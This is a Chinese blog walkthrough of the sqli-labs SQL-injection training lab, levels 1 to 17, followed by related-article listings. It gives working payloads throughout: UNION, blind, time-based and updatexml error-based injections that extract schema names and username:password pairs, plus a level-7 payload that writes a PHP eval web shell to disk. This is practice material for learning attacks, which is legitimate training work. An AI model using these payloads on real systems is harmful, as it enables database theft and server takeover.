sqli-labs靶场1-20

最新推荐文章于 2024-09-24 08:39:48 发布
最新推荐文章于 2024-09-24 08:39:48 发布
阅读量1.1k 收藏 32
点赞数 28
文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74299778/article/details/139026590
版权

# **1.    less-1**
寻找注入点----更改id值,页面回显值发生变化
 


 
判段注入类型---使用单引号闭合回显正确信息,因此是字符型注入
         
判断数据库有几列---三列正常回显,四列报错,说明数据库有三列
 
 
使用联合查询判断哪几列可以回显---使查询失败然后返回联合查询的内容
 
爆数据库名 
 
爆表名---  
?id=99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+
 
爆字段名---  
?id=99' union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+
 
获取目标信息---
?id=99' UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+
 
# 2.    less-2
判断注入点
 
 
判断注入类型--- 使用单引号闭合根据回显的报错信息判断为数字型
 
判断数据库有几列---不使用引号闭合

 
判断哪几列可以回显
 
爆数据库名---
?id=99 UNION SELECT 1,database(),3 --+
 
爆表名---
?id=99 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+
 
爆字段名---
?id=99 union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+
 
获取目标信息---
?id=99 UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+
 
# 3.    less-3
同上判断注入点和注入类型,根据回显的报错结果使用单引号和小括号闭合
 
同上使用小括号闭合,获取数据库信息
# 4.    less-4
同上判断注入点和注入类型,根据回显的报错结果使用双引号和小括号闭合
 
 
# 5.    less-5
正常输入,根据回显信息只能判断值是否存在,输入不存在的值则回显不显示
 
 
输入单引号闭合---判断出是字符型
 
判断数据库列数---3列
 
 
因为回显只能判断是否正常获取值---使用二分法获取数据库长度
     
爆数据库名---一个个尝试,输入不同的字符,测试出数据库名的第一个字符为  s
 
 
接下来判断数据库名的第二个字符
 
最后爆破出数据库名为----security
 
然后爆表名---通过修改限制条件来判断存在user表
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='users',sleep(5),5)--+
 
爆字段名----检测user表中是否存在一个password列
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(5),1)--+
 
检查user表中是否存在一个username列
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='username',sleep(5),1)--+
 
获取目标信息---
?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb',sleep(5),1)--+
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb',sleep(5),1)--+
# 6.    less-6
同less-5判断注入类型---字符型,使用双引号闭合
 
然后同上获取数据库信息
# 7.    less-7
判断注入类型---字符型,使用单引号和双小括号闭合
 
   
使用同一网站网站的多个注入点获取文件路径
 
写入木马文件---
?id=1')) UNION SELECT 1,2,'<?php @eval($_POST["attack"]);?>' into outfile "E:\\app\\php\\WWW\\sqli-labs-master\\Less-7\\text.php"--+
 
 
使用蚁剑连接木马文件
   
8.    less-8
判断注入点注入类型---使用单引号闭合但是不报错,说明是布尔盲注
 
 
用less-5方式获取数据库信息
9.    less-9
判断注入类型
    
  
根据以上结果发现网页回显不会得到任何信息---接下来使用burp suite抓包
 
响应时间明显增加,接下来使用less-5的方式根据响应时间来获取数据库信息
# **10.    less-10**
判断注入类型---使用单引号闭合没有时间延迟
 
使用双引号闭合感觉到时间延迟
 
使用less-5的方式获取数据库信息
11.    less-11
先判断输入框的作用---正常登陆了
 
密码行使用单引号闭合---报错说明存在注入点
 
使用burp suite抓包更改输入语句---判断有几列
 
 
爆数据库名---使用户名查询失败
uname=a&passwd=a' UNION SELECT database(),1#&submit=Submit
 
爆表名
uname=a&passwd=a' UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=0x7365637572697479#&submit=Submit
 
爆字段名
uname=a&passwd=a' UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_schema='security' AND table_name='users'#&submit=Submit
 
获取目标信息---
uname=a&passwd=a' UNION SELECT 1,group_concat(concat_ws(':',username,password)) FROM security.users#&submit=Submit
 
12.    less-12
判断注入类型---双引号加小括号闭合
 
 
 
同less-11获取数据库的信息
13.    less-13
判断数据库注入类型---字符型,使用单引号和小括号闭合,成功登录无回显使用布尔盲注
 
 
判断数据库列数---
uname=a') OR 1 = 1 ORDER BY 2#&passwd=a&submit=Submit
 
 
判断数据库名长度---
uname=a') OR LENGTH((SELECT database())) > 5#&passwd=a&submit=Submit
   
爆数据库名---判断数据库名左边第一个字符是不是  a
uname=a') OR LEFT((SELECT database()),1) = 'a'#&passwd=a&submit=Submit
 
使用burp suite 爆破---最后得到数据库名为security
 
14.    less-14
判断注入类型---字符型,使用双引号闭合
   
同less-13 获取数据库信息
15.    less-15
判断注入类型---字符型,使用单引号闭合---报错无显示,使用布尔盲注
 
 
同less-13使用登录成功来判断然后获取数据库信息
16.    less-16
判断注入类型---字符型,使用双引号小括号闭合,无回显使用布尔盲注
 
 
 
方法同less-13获取数据库信息
17.    less-17
先运行一遍页面---发现这是修改密码
 
在less-11登录验证发现密码已被修改
 
寻找注入点---发现需要先判断用户是否存在,然后再执行修改密码
 
 
 
使用报错注入
uname=admin&passwd=' OR updatexml(1,concat("!",version()),2)#&submit=Submit
 
爆数据库名
uname=admin&passwd=' OR updatexml(1,concat("!",database()),2)#&submit=Submit
 
爆表名
uname=admin&passwd=' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2)#&submit=Submit
 
爆字段名
uname=admin&passwd=' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2)#&submit=Submit
 
获取目标信息
uname=admin&passwd=' OR updatexml(1,concat('!',(SELECT group_concat(':',username,password) FROM users)),1)# &submit=Submit

苍心有泪泪中天
关注
sqli-labs靶场搭建
AlienEowynWan的博客
11-17 340
解压放在phpstudy的WWW文件夹
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2215
本文章主要是关于sqli-labs靶场1-20关的通关方法
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs-master靶场通关
m0_75208155的博客
08-12 861
sqli-labs-master靶场通关
sqli-labs靶场安装
qq_44624916的博客
02-04 523
小皮phpstudy搭建sqli-labs靶场
sqli-labs靶场通关攻略
test_zpx的博客
08-14 444
Good Good Study,Day Day Up!
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1185
Sqli-labs-master靶场1-20通关教程
sqli-labs靶场(1-20)通关手册
m0_58168821的博客
07-03 737
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 532
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master.zip
03-17
SQL-labs靶场包含了丰富的练习场景,涵盖了各种类型的SQL注入漏洞,例如:盲注、时间盲注、基于错误的注入、联合查询注入、堆叠查询注入等。这些练习可以帮助你理解每种注入方式的工作原理,以及如何利用它们进行...
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4406
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 255
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 462
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
Java Alibaba Druid 数据库连接池
最新发布
miracle的专栏
09-24 717
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的各种类型和利用方法。 首先,我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值